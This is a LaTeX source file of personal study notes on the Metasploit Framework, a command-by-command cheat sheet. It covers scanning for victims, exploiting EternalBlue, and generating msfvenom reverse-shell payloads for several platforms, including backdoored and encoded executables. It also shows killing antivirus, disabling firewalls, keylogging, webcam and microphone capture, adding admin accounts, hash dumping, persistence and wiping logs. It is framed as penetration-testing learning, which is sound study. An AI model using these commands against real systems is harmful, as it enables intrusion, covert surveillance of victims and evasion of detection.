\documentclass{article}
\usepackage[utf8]{inputenc}
% (1) choose a font that is available as T1
% for example:
\usepackage{lmodern}
% (2) specify encoding
\usepackage[T1]{fontenc}
% (3) load symbol definitions
\usepackage{textcomp}
\usepackage{xcolor}
\usepackage{listings}
\usepackage{xparse}
\usepackage{hyperref} 

\NewDocumentCommand{\codeword}{v}{%
\texttt{\textcolor{red}{#1}}%
}
\lstset{language=bash,keywordstyle={\bfseries \color{red}}}


\title{Notes from "learn the Metasploit Framework inside out"}
\author{H3xFiles \\ Twitter: @MindwarelabBot\\ www.mindwarelab.org }
\date{August 2019}
\maketitle

\tableofcontents
\begin{document}

\section{Getting ready to use Metasploit}
\codeword{apt install metasploit-framework} \\
\codeword{service postgresql start} \\
\codeword{update-rc.d postgresql enable}\\
\codeword{msfdb init}

\section{Help and Search stuffs}
\codeword{help core}  \\ 
\codeword{help module} \\
\codeword{search type:exploit nameOfTheExploit CVE: year}\\
\codeword{info nameOfTheExploit}\\
\codeword{grep console search type:exploit nameOfTheExploit}\\
\codeword{grep nessus history}\\
\codeword{searchsploit -x nameOfTheExploit} 
\subsection{Other commands}
\codeword{history} to check the commands history\\
\codeword{get} to get current local sessions\\
\codeword{getg} to get global session\\
\codeword{spool off} write console output into a file as well the screen

\section{Working with workspaces}
To create a new workspace in metasploit type \codeword{workspace -a <name>}, then you can check the workspaces available with \codeword{workspace -v} check the active worksapces\\
or delete one with the command \codeword{workspace -d}. Each work space has its own history, jobs, sessions, vulns, hosts and notes. For full list of commands as usual check help. To export the all the info saved in the workspace \codeword{db_export -f xml <path/filename>}

\section{Connect to a shell with metasploit}
You can connect to a shell normally like a linux terminal using the command \codeword{connect}. In order to test this command open a terminal and type \codeword{nc -nlvp 4444 -e /bin/bash} to open a temporary shell with netcat. Then, from the metasploit terminal type \codeword{connect localhost 4444}.

\section{Gather information}
Information Gathering and getting to know the target systems is the first process in ethical hacking. Reconnaissance is a set of processes and techniques (Footprinting, Scanning & Enumeration) used to covertly discover and collect information about a target system.\\
During reconnaissance, an ethical hacker attempts to gather as much information about a target system as possible, following the seven steps listed below:\\
    - Gather initial information\\
    - Determine the network range\\
    - Identify active machines\\
    - Discover open ports and access points\\
    - Fingerprint the operating system\\
    - Uncover services on ports\\
    - Map the network
\subsection{Zmap: in search for a victim}
A reverse way to gather information is to find first the CVE and the vulnerable web-service, and on which rport the service is listening. To do so, we can use:
\codeword{search type:exploit cisco CVE:2019} and after\\ \codeword{use exploit/linux/http/cpi_tararchive_upload}, we can examine the exploit information. In this case the port \codeword{8082} seems to be TCP port on which the health monitor is listening. After we have this information we can search on Shodan or using Zmap \codeword{zmap -B 50M -p 8082 -n 10000000 --dryrun -o results.csv}. Zmap is not coming with kali and need to be installed \codeword{sudo apt install zmap}. 

\subsection{Scan with Namp}
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service up time. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. The potential of Nmap are enormous, and there are entire courses dedicated to information gathering with Nmap. But let's see Nmap in respect of metasploit. \codeword{db_nmap -Pn -sT -p- -sV -sC -O <ip> -oX <ip>_nmap.xml}, this scan is a no ping scan, OS detection, script over the services, all ports. Everything is saved in our workspace. Other useful command on Kali is \codeword{netdiscover}. 

\subsection{Nessus module}
After using nmap, Nessus is another important tool to gather information on the machine and its vulnerabilities. Nessus is a commercial application, but support a community edition not suitable for professional use. 
First you need to register giving of course fake information like temporary email and fake name and continue downloading the product. \codeword{dpkg --install Nessus-x.x.x-debian.deb}, then \codeword{/etc/init/init.d/nessus start} and check using the command \codeword{service nessusd status}. To check on which port is running \codeword{netstat -ap | grep nessus}. After than you need to open the browser and go to \codeword{https://localhost:<portnumber>} and follow the account creation. 
\\Useful command list for nessus:\\
- \codeword{/opt/nessus/sbin/nessuscli luser} to check a list of users.\\ 
- \codeword{/opt/nessus/sbin/nessuscli adduser} add a new user\\ 
- \codeword{/opt/nessus/sbin/nessuscli chpasswd} change password\\ 
- \codeword{nessus_connect usr:pwd@localhost:port} connect to nessus\\
- \codeword{nessus_scan_new <policy_name> <title> <descr> <ip>} Add New scan. Ps: you need to create the policy first. \\
- \codeword{nessus_scan_launch <id>} Start to scan\\
- \codeword{nessus_scan_list} list of scans\\
- \codeword{nessus_db_import <id>} save in a workspace. id is from the list of scans\\
- \codeword{load nessus}\\
- \codeword{help nessus}\\
- \codeword{grep nessus history}\\
After you can use the usual command \codeword{vulns} to check all the vulnerabilities found on the target and from there continue your hacking session.

\section{Auxiliary modules}
The Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing, sniffing, and much more. Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.
\subsection{Reverse shell server}
In this case we want the victim to click on a file, it will perform an outbound request, which is usually not blocked, and you will be able to connect to the victim machine. To receive the connection back from the victim go to \codeword{use multihandler}, then \codeword{set payload windows/shell/reverse_tcp}, \codeword{setg lhost<ip>}, \codeword{setg lport <port number>}, \codeword{run}.

\section{Exploitation}
\subsection{searching the exploit: searchsploit}
Searchsploit is an easier and faster way to search for an exploit and to do so there are several ways to do it.
\codeword{searchsploit -t <name application> <os type>}\\
To know more about an exploit you can use \codeword{searchsploit <exploit number> --examine} or \codeword{searchsploit -x <exploit number> }
To use the result of nmap \codeword{nmap -sV 192.168.1.102 -oX result.xml} you can use \codeword{searchsploit –x --nmap result.xml}. In order to access more information you can use the flag \codeword{searchsploit <name> -w}
\subsection{searching the exploit: search type: exploit}
Another method is using the command \codeword{search type:exploit <name> <system> CVE:<years>}.

\subsection{Configure the exploit}
Start searching for the exploit you are interested \codeword{search type:exploit eternal} or using searchsploit in this case for example we look for the \textit{eternal blue} exploit for windows. Then, when you have the path of the exploit you are looking for use \codeword{use exploit/windows/smb/ms17/_010_eternal_blue}. After you are inside the module you can type info to get options and general info about the exploit. You can type \codeword{options} or \codeword{advanced} to the basic options that the exploit has to offer and a brief explanation. To set the \textit{rhost} or remote host type \codeword{set rhost <ip>}. If you want to check if the target is vulnerable without attacking it yet you can use the command \codeword{check}. In order to use more than one exploit at the time, you might want to push the exploit session to the "stack" with the command \codeword{pushm}, then you can use another exploit. To fast return to the previous exploit type \codeword{previous} or \codeword{popm}. In case you need to code editing an exploit you can use \codeword{edit} from inside the exploit module after using \codeword{use}. 

\subsection{Payloads}
The payload is a piece of code executed as result of a successful exploitation. Usually, the payload is encrypted to avoid that AV or other defensive tools can understand the meaning of that piece of code. A payload can contain the code to open a remote shell on the victim computer, RAT tools, key loggers, ... anything that call back the attacking machine. This is due that many AV solutions and protections tools only protect from the outside, but are blind if the victim machine try to call back itself an external server. Once inside the exploit type \codeword{show payloads}, then \codeword{set <name of the payload>} and \codeword{set rhost <ip>}, \codeword{set lhost <ip>} and \codeword{set lport <number port>} the port can be for example 4444. After that you can use \codeword{check} or \codeword{run -j}, the \codeword{-j} parameter is to run the exploit in the background. To have a list of all the running exploit type \codeword{jobs -i}.

\subsection{Msfvenom}
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode. In this example we are generating a reverse shell payload for linux, open a new tab on the terminal in Kali and type \codeword{msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > example.elf}. After that make it runnable with \codeword{chmod +x exploit_name} and run it with \codeword{./exploit_name}. You can go back to the metasploit framework terminal and  type \codeword{sessions} to see the background job. Other important commands for msfvenom is to check which type of payload you have for a determinate exploit \codeword{msfvenom --payload linux/x86/meterpreter/reverse_tcp --payload-options}, \codeword{msfvenom --help-format}, \codeword{msfvenom --help-platforms}, \codeword{msfvenom --list payloads | grep php}.

\section{Meterpreter: post exploitation}
By now, you should be having a  Meterpreter shell. So, it is time to do something from the inside. Meterpreter has all the “basic” features one would expect from a penetration testing tool. These include access to a command shell, running executable, sending and receiving files and profiling the network. But it can do much more than that. Taking screenshots, key-logging, port forwarding and privilege escalation are only a few of its capabilities. Moreover, it can load various in-memory modules such as Mimikatz for dumping hashes and plain-text passwords. Meterpreter itself resides entirely in memory, writes nothing to disk, and creates no new processes. Instead, it injects itself into compromised processes and can also migrate from one to another as necessary. If you need to put in the background to work on something else use the command \codeword{background}. To back to the session is \codeword{session <number>}. Once, inside you want to know which type of privileges you have, to do so type \codeword{getuid}, 0 == root. To drop a shell to navigate the system just type \codeword{shell}, all the commands will be available like a normal system depending on the privilege level. To exit type \codeword{exit} it won't kill the Meterpreter. To know more about the system ... as you may already guessed type \codeword{sysinfo}. Typing \codeword{help} you can see all the funny stuff you can do on the machine, and don't worry it works on Windows and Linux machines interchangeably. 

\subsection{How to migrate}
When you are inside you want migrate to a less visible process, such as explorer.exe \cite{migratelala}\\
\codeword{ps}\\
\codeword{migrate <PID>}\\
\codeword{shell}\\

\subsection{Monitoring the target victim}
Once you are inside the target victim is time to do the job you are came from extracting information or monitoring the victim. 
1) kill the AV:\\
\codeword{background}\\
\codeword{search type:post killav}\\
\codeword{use post/windows/manage/killav}\\
\codeword{sessions}\\
\codeword{set session <number>}\\
\codeword{run}\\
\codeword{netsh advfirewall set currentprofile state off}\\
2) Screenshots:\\
You could setup a script to periodically take a screenshot or depening on the input enable the screenshot taking.\\
\codeword{screenshot}\\
3) Keylogging\\
\codeword{keyscan start}\\
\codeword{keyscan dump}\\
\codeword{keyscan stop}\\
4) Screen monitoring\\
\codeword{run vnc -i}\\
5) Webcam and microphone\\
\codeword{webcam_list}\\
\codeword{webcam_chat}\\
\codeword{webcam_stream}\\
\codeword{record_mic}\\
6) Disable keyboard or mouse\\
\codeword{uictl disable keyboard}\\
\codeword{uictl disable mouse}\\
7) Add a user:\\
\codeword{net user <username> <password> /add}\\
\codeword{net localgroup administators <username> /add}
8) Connect to remote Desktop:\\
\codeword{rdesktop -u <username> -p <password> <ip>:3389}\\

\section{Privilege escalation}
When you first enter a system is not always the case you are already have root, therefore you need to work your way up using various methods. To know your current privilege level type \codeword{getuid}. Meterpreter has an integrate way to try to escalate typing \codeword{getsystem} (only for Windows). If this does not work you could try to fish his credential with \codeword{post/windows/phish_windows_credentials}.
\subsection{Enumeration}
Enumeration is defined as the process of extracting user names, machine names, network resources, shares and services from a system. The goal is to find vulnerable software, files, passwords, services and have a full map of the system. For this mission type \codeword{background} and \codeword{search type: post enum_applications}. After as usual use that with the keyword \codeword{use}, set the session and run it.
\subsection{cracking hashes}
To gather the hashes use \codeword{use post/windows/gather/hashdump}, then we use jtr typing \codeword{auxiliary/analyze/jtr_crack_fast}. Then, \codeword{loot} and \codeword{creds} to check the result.
\section{Persistence}
From inside meterpreter use \codeword{run persistence -U -i 120 -p 31337 -r <your IP>}
\codeword{set payload windows/meterpreter/reverse_tcp}, \codeword{set port 31337}, \codeword{run}.
\section{Cleaning up}
\codeword{clearev}
\\Clean up logs on linux: \\\codeword{run event_manager -i}, \\\codeword{    kwrite /var/log/messages}, \\\codeword{more ~/.bash_history},\\ \codeword{export HISTSIZE=0},\\ \codeword{shred -zu root/.bash_history}\\
Clean up logs on Win: \\
\codeword{use post/windows/manage/sdel}\\
\codeword{clearlogs.exe -sec}, \\
\codeword{https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/resources/Clearev.py}
\section{Msfvenom Extra} 
In case Msfvenom isn't enough try \href{https://github.com/Veil-Framework/Veil}{https://github.com/Veil-Framework/Veil} payload generator and then \href{https://github.com/xoreaxeaxeax/movfuscator}{https://github.com/xoreaxeaxeax/movfuscator} to obfuscate the code. 
\subsection{Binary}
Creates a simple TCP Payload for Windows: \cite{Msfvenom Cheat Sheet}\\
\codeword{msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe}\\
Creates a simple HTTP Payload for Windows:\\
\codeword{msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe}  \\
 Creates a simple TCP Shell for Linux:\\
\codeword{msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf} 	\\
 Creates a simple TCP Shell for Mac:\\
\codeword{msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho} 	    \\
Create a simple TCP Payload for Android:\\
\codeword{msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk} 	     \\

\subsection{Windows payloads}
Lists all avalaible encoders: \cite{Msfvenom Cheat Sheet}\\
\codeword{msfvenom -l encoders} \\
Binds an exe with a Payload (Backdoors an exe):\\
\codeword{msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe}\\
Creates a simple TCP payload with shikataganai encoder:\\
\codeword{msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe}\\
Binds an exe with a Payload and encodes it:\\
\codeword{msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe} 
\subsection{Web Payload}
Creates a Simple TCP Shell for PHP: \cite{Msfvenom Cheat Sheet}\\
\codeword{msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php }	\\
Creates a Simple TCP Shell for ASP:\\
\codeword{msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp} 	\\
Create a Simple TCP Shell for Javascript:\\
\codeword{msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp} 	\\
Create a Simple TCP Shell for WAR:\\
\codeword{msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war} 	\\

\section{Scripting}
You can automate metasploit with scripts. \codeword{vim <name>} and place all the list of commands in order you ould execute manually. \codeword{use multi/handler} and then \codeword{set payload linux/x64meterpreter/reverse_tcp},\codeword{set lhost <ip> set lpost<number>}. To get in and out the console you can use \codeword{ctrl-z} to send it in background and \codeword{fg} to bring the msf console back in foreground.To run it type \codeword{resource <name>} or \codeword{msfconsole --resource <name>}. You can check then with \codeword{jobs} and kill it with \codeword{Kill -K}. If you want to record the commands you used and save it into a file you can use \codeword{makerc <name>}.

\section{Section reference}
\textit{Find ip address} \codeword{hostname -I}.\\
\textit{Use exploit} \codeword{use exploit/targetServicename/type/exploitName}\\
\textit{Show basic options} \codeword{show options}\\
\textit{Show advance Options} \codeword{show advanced}\\
\textit{Set a remote host} \codeword{set RHOST <ip>'}\\ 
\textit{Set a remote port} \codeword{set RPORT port <number>}\\ 
\textit{Set a local host} \codeword{set LHOST <ip>}\\ 
\textit{Set a local port} \codeword{set LPORT Port <number>}\\ 
\textit{Check if the target is vulnerable } \codeword{check'}\\ 
\textit{Set local active connection } \codeword{set SESSION <number>}\\ 
\textit{Get current session} \codeword{get session}\\
\textit{Set global active connection} \codeword{setg SESSION <number>}\\ 
\textit{Unset global session} \codeword{unsetg SESSION}\\
\textit{Kill specific connection} \codeword{sessions -k <number>}\\
\textit{Kill all the connections} \codeword{sessions -K}\\
\textit{find an exploit} \codeword{searchsplouit ruby on rails}\\
\textit{Examine an exploit} \codeword{searchsplouit -x number.rb}\\
\codeword{dirb https://<ip:port> -S -w /usr/share/wordlists/dirb/common.txt}\\

\begin{thebibliography}{9}

\bibitem{Sans cheat sheet} 
Sans cheat sheet
\texttt{https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf}

\bibitem{Msfvenom Cheat Sheet} 
Msfvenom Cheat Sheet
\texttt{https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/}

\bibitem{migratelala}
How to migrate to another process
\texttt{https://jlajara.gitlab.io/posts/2018/11/26/process-migration.html}

\end{thebibliography}





\end{document}